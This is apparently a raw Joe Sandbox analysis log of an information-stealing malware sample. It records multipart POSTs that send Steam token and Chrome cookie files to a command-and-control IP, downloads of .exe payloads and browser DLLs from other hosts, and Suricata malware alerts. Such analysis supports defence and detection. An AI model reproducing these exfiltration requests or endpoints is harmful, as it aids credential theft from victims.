65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 2b 64 41 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; 
name="file_data"N+dA------JDBFIIEBGCAKKEBFBAAF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 147.45.68.138Content-Length: 98233Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="mode"5------BFBGDGIDBAAEBFHJKJDG--
Source: global traffic HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGHDBAFIJJJJKJDHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 32 33 35 38 38 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; 
name="mode"51------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="task_id"1023588------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="status"1------BFIDGHDBAFIJJJJKJDHD--
Source: global traffic HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 32 33 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 2d 2d 0d 0a Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; 
name="mode"51------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="task_id"1023589------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="status"1------KKKEBKJJDGHCBGCAAKEH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 2d 2d 0d 0a Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="mode"6------HJDGHIJDGCBAAAAAFIJD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: stadiatechnologies.comContent-Length: 3225Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258-a33c7340-61ca------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HCBFIJJECFIEBGDGCFIJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKEHJEGCFCAKFIIJJJHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 48 4a 45 47 43 46 43 41 4b 46 49 49 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------GHJKEHJEGCFCAKFIIJJJContent-Disposition: form-data; name="mode"1------GHJKEHJEGCFCAKFIIJJJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="mode"2------EHJDGHJDBFIJKECAECAF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFIDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="mode"21------EHDBGDHDAECBGDHJKFID--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 147.45.68.138Content-Length: 8081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 35 35 63 31 62 31 61 62 61 65 33 35 37 63 62 35 30 63 34 31 35 66 61 32 30 62 32 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 
79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"89455c1b1abae357cb50c415fa20b20d------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="file_name"Q29va2ll
Source: Joe Sandbox View IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View IP Address: 95.164.119.162 95.164.119.162
Source: Joe Sandbox View ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49702 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49710 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49734 -> 147.45.44.104:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=kxNpgzCHIQX.RGCAsbyPpea8VQ8zTqPRZLmy2FiWcC4-1724878516-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_XOQbUhQrJ6L1xvGO.BLgMQMbLZJ8u_sHe.5Wkz2_pk-1724878566-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: unknown TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 3_2_00405000
Source: global traffic HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=c502aee2533efa76c5_13289933752292435604
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
